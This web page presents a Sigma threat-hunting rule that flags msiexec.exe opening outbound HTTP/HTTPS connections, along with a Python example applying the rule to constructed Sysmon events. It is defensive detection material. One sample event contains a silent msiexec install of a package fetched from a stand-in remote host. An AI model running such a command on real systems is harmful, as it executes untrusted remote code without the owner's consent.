Type: Threat Hunt | Level: low | Status: test

Msiexec.EXE Initiated Network Connection Over HTTP

Detects a network connection initiated by an "msiexec.exe" process to destination port 80 or 443. Adversaries might abuse "msiexec.exe" to download, install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications; it is deliberately broad, so matches need triage rather than alerting.

Author: François Hubaut. Created Sun Jan 16, updated Tue Jul 16. Rule ID 8e5e38e4-5350-4c0b-895a-e872ce0dd54f. Product: windows.

Hunting Hypothesis

If msiexec.exe is being used to install packages hosted on a remote web server, it will itself initiate outbound connections to port 80 or 443. Reviewing those connections (destination, command line, parent process) separates legitimate installer downloads from proxy-execution abuse.
Log Source
Product: Windows (raw: windows)
Category: Network Connection (raw: network_connection)

Events for outbound and inbound network connections including DNS resolution.

Detection Logic (1 selector)
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\msiexec.exe'
        DestinationPort:
            - 80
            - 443
    condition: selection
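To make the selection above concrete, here is the same logic applied to a handful of network connection events. This is an added example and is not part of the Sigma rule, the SigmaHQ repository, or any converter backend. The events are constructed for illustration; field names follow the Sigma network_connection category (Image, Initiated, DestinationPort) as Sysmon Event ID 3 populates them. It also shows two details a converted rule relies on: Sigma string matching is case-insensitive by default (so a mixed-case image path still matches), and Sysmon emits the port and the Initiated flag as strings, which the check normalises before comparing.

```python
"""Apply the msiexec.exe HTTP/HTTPS network connection selection to
Sysmon-style events (Sigma rule 8e5e38e4-5350-4c0b-895a-e872ce0dd54f).

Added example, not code from the SigmaHQ rule or repository.  The sample
events are constructed and are not real telemetry."""

from typing import Dict, Iterable, List

# Selection criteria transcribed from the rule's detection block.
IMAGE_SUFFIX = "\\msiexec.exe"
DEST_PORTS = {80, 443}


def matches(event: Dict[str, str]) -> bool:
    """Return True when the event satisfies every field in `selection`.

    Sigma string matching is case-insensitive unless the `cased` modifier
    is used, so Image is lowercased before the endswith test.  Sysmon
    emits Initiated and DestinationPort as strings; both are normalised
    here so the check behaves the same on raw and pre-typed events."""
    initiated = str(event.get("Initiated", "")).lower() == "true"
    image = str(event.get("Image", "")).lower().endswith(IMAGE_SUFFIX)
    try:
        port = int(event.get("DestinationPort", -1))
    except (TypeError, ValueError):
        return False  # malformed port field: cannot satisfy the selection
    return initiated and image and port in DEST_PORTS


def hunt(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the selection and return the matching events for triage."""
    return [e for e in events if matches(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 1. Inbound connection accepted by msiexec: Initiated is false, no match.
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "Initiated": "false",
     "DestinationPort": "443", "DestinationIp": "10.0.0.5"},
    # 2. Outbound HTTPS from msiexec with a remote package URL on the
    #    command line: the case the rule is meant to surface.
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "Initiated": "true",
     "DestinationPort": "443", "DestinationIp": "203.0.113.10",
     "CommandLine": "msiexec.exe /q /i https://203.0.113.10/update.msi"},
    # 3. Mixed-case image path on port 80: still matches (case-insensitive).
    {"Image": "C:\\WINDOWS\\SysWOW64\\MsiExec.EXE", "Initiated": "true",
     "DestinationPort": "80", "DestinationIp": "198.51.100.7"},
    # 4. msiexec talking to a non-web port (SMB): outside the rule's scope.
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "Initiated": "true",
     "DestinationPort": "445", "DestinationIp": "10.0.0.9"},
    # 5. A different binary on 443: Image suffix does not match.
    {"Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": "true",
     "DestinationPort": "443", "DestinationIp": "203.0.113.10"},
    # 6. Benign-looking vendor download by msiexec over HTTPS.  It matches
    #    too, which is why the rule is hunting-level with "Likely" false
    #    positives: the analyst separates 2 from 6 by destination, command
    #    line and parent process, not by this selection alone.
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "Initiated": "true",
     "DestinationPort": "443", "DestinationIp": "192.0.2.25",
     "CommandLine": "msiexec.exe /i C:\\Temp\\VendorTool.msi /qn"},
]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["DestinationIp"], hit.get("CommandLine", "<no command line>"))
```

Run as-is it lists the three matching events (2, 3 and 6). The last of those is the false-positive shape the rule's "Likely" rating warns about, so when converting the rule for a real backend, plan to enrich hits with CommandLine and ParentImage rather than alerting on the selection alone.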
False Positives

Likely

MITRE ATT&CK
Tactic: Defense Evasion (attack.defense-evasion)
Sub-technique: T1218.007 System Binary Proxy Execution: Msiexec (attack.t1218.007)

Other tags: detection.threat-hunting
Rule Metadata
Rule ID
8e5e38e4-5350-4c0b-895a-e872ce0dd54f
Status
test
Level
low
Type
Threat Hunt
Created
Sun Jan 16
Modified
Tue Jul 16
Path
rules-threat-hunting/windows/network_connection/net_connection_win_msiexec_http.yml
Raw Tags
attack.defense-evasion, attack.t1218.007, detection.threat-hunting